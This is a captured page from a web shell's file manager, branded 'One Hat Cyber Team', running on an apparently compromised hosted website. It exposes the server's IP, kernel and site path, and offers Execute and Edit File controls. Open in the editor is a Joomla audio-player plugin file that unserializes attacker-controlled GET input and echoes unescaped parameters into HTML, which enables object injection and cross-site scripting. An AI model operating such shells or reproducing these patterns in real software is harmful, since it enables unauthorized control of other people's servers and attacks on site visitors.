One Hat Cyber Team
Your IP:
216.73.216.75
Server IP:
213.186.33.17
Server:
Linux webm007.cluster106.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Create File
|
Create Folder
Execute
Dir :
~
/
home
/
tcherkas
/
balalaika.eu
/
plugins
/
content
/
nmapp
/
Edit File:
popup.php
<?php /** * Pro Magic Audio Player *This program is free software: you can redistribute it and/or modify it under the terms *of the GNU General Public License as published by the Free Software Foundation, *either version 3 of the License, or (at your option) any later version. * *This program is distributed in the hope that it will be useful, *but WITHOUT ANY WARRANTY; without even the implied warranty of *MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *GNU General Public License for more details. * *You should have received a copy of the GNU General Public License *along with this program. If not, see <http://www.gnu.org/licenses/>. * *@author ProJoom *@copyright (C) 2008 - 2015 ProJoom *@link http://www.projoom.com/extensions/pro-magic-audio-player.html Official website **/ error_reporting(E_ALL ^ E_NOTICE); $location = unserialize(gzuncompress(stripslashes(base64_decode(strtr($_GET['url'], '-_,', '+/='))))); $pwidth = $_GET['plw']; $pheight = $_GET['plh']; $pagetit = $_GET['tit']; $send = $_GET['cfg']; $bgcol = $_GET['bgc']; if (empty($bgcol)) { $bgcol = "FFFFFF"; } $player = $location.'modules/mod_nmap/audio/nmaplayer.swf'; $playlist = $send; echo "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"> <html> <head> <title>$pagetit</title> </head> <body bgcolor=\"#$bgcol\"> <div align=\"center\"><object style=\"outline:none;\" type=\"application/x-shockwave-flash\" id=\"nmap_popup\" data=\"$player\" width=\"$pwidth\" height=\"$pheight\"> <param name=\"movie\" value=\"$player\" /> <param name=\"base\" value=\"$location\" /> <param name=\"wmode\" value=\"transparent\" /> <param name=\"flashvars\" value=\"uid=$playlist\" /> </object> </div> </body> </html>"; ?>
Simpan